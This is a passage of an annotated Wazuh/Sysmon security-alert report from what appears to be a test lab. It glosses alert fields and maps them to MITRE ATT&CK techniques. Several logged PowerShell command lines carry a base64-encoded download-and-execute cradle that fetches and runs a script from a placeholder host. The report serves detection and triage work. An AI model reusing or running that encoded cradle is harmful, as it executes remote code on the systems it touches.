Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534411.2001436
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:09.1484914Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285772
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:09.120 ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} ProcessId: 16560 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1 CreationUtcTime: 2025-04-24 22:40:09.120 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:09.120
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc7-680a-c40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16560
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:09.120
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:13.645+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:13.645+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  103
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534413.2004205
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:11.7337351Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285800
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:10.418 ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} ProcessId: 16772 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} ParentProcessId: 16560 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:10.418
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdca-680a-c70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc7-680a-c40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16560
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:14.588+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:14.588+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  107
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534414.2012276
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:11.9674782Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285801
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:11.949 ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} ProcessId: 16772 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2glcj434.zx1.ps1 CreationUtcTime: 2025-04-24 22:40:11.949 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:11.949
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdca-680a-c70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2glcj434.zx1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:11.949
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:17.537+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:17.537+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  108
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534417.2015045
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:15.1527371Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285824
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:15.104 ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} ProcessId: 16908 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_apqxmac4.3kk.ps1 CreationUtcTime: 2025-04-24 22:40:15.104 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:15.104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdcd-680a-c90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_apqxmac4.3kk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:15.104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:17.537+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:17.537+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  104
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534417.2017814
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:14.9148096Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285823
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:13.227 ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} ProcessId: 16908 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} ParentProcessId: 16772 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:13.227
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdcd-680a-c90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

